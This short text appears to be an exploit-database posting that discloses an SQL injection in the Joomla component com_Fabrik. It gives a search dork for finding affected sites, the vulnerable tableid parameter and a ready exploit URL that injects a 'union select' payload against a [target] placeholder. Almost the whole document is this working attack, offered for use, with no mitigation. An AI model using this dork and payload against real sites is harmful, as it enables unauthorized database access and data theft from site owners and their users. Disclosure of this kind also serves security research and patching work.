25 lines
No EOL
831 B
Text
25 lines
No EOL
831 B
Text
$##################################################################$
|
|
# +==============================================================+
|
|
# | Joomla Component (com_Fabrik) SQL Injection Vulnerability |
|
|
# +==============================================================+
|
|
# Vendor : http://fabrikar.com/
|
|
# Author : Mkr0x
|
|
# Home : www.kernel.ge
|
|
# E-mail : mkrcard@gmail.com
|
|
# Place : Georgia
|
|
$##################################################################$
|
|
# Dork :
|
|
index.php?option=com_fabrik
|
|
--
|
|
# Vulnerable :
|
|
http://[target]/index.php?option=com_fabrik&view=table&tableid=[SQL]
|
|
--
|
|
# Exploit :
|
|
http://[target]/index.php?option=com_fabrik&view=table&tableid=13+union+select+1--
|
|
--
|
|
|
|
Best Regards
|
|
-Mkr0x-
|
|
|
|
# „Georgia has always been at the foreground“ ..
|
|
$##################################################################$ |